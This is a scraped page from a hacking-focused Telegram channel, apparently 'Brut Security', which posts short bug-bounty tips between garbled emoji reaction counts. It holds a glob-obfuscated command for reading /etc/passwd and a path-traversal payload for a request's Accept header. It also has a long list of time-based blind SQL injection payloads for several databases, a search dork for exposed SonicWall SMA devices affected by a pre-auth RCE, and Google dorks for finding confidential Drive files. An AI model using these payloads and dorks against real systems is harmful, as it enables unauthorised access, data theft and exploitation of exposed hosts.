Use shell globbing / wildcard expansion. Here is an example
cat /e*c/p*s*d cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c:
/p*s*d:Please open Telegram to view this post
VIEW IN TELEGRAM
π19π«‘7
CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating π₯
A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.
Search at Netlas.io:
π Link: https://nt.ls/FLFJT
π Dork: http.headers.server:"SMA"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.
Search at Netlas.io:
π Link: https://nt.ls/FLFJT
π Dork: http.headers.server:"SMA"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
π₯5β€3π3
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯6
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯12π8β€5
Intercept the request in Burp and replace the Accept header with:
Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€43π15π₯8π«‘4πΏ2
Brut Security
Drop Reactions β‘οΈ β‘οΈ β‘οΈ β‘οΈ β‘οΈ β‘οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
β€17π4π«‘4
Please open Telegram to view this post
VIEW IN TELEGRAM
Standoff365
BugBounty
Bug Bounty platform with generous rewards from the leading Russian companies Help companies find their flaws and get generous payouts. Max bounty: $660,000. Exclusive new scope. 100+ public programs. Fast payouts. Strong triage team
π₯4πΏ3
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
β€28π13
This media is not supported in your browser
VIEW IN TELEGRAM
For Real Bruh π π π π π
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯15π³2π€¨2πΏ2π1
curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯24β€3π3π¨βπ»3π«‘3
site:https://drive.google.com inurl:folder
site:https://drive.google.com inurl:open
site:https://docs.google.com inurl:d
site:https://drive.google.com "confidential"
site:https://docs.google.com inurl:d filetype:docxPlease open Telegram to view this post
VIEW IN TELEGRAM
π9π₯7β€2
Brut Security
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: Public google drive...
**Description:**
I found google drive link `https://drive.google.com/drive/folders/ βββββββββ` at `https:// ββββββββ.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...
I found google drive link `https://drive.google.com/drive/folders/ βββββββββ` at `https:// ββββββββ.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...
π4β€1π«‘1
vanillacommunities.com Business logic vulnerability POC - https://t.iss.one/brutsecurity_poc/14
π5π₯5
Please open Telegram to view this post
VIEW IN TELEGRAM
1π₯17β€6π4π¨βπ»2
Business Logic POC - Able To Unsubscribe User From Company
https://t.iss.one/brutsecurity_poc/16
https://t.iss.one/brutsecurity_poc/16
β€11π₯5π3
Drop Reactions βοΈ βοΈ βοΈ βοΈ βοΈ βοΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
π«‘16π₯10β€1π€¨1π¨βπ»1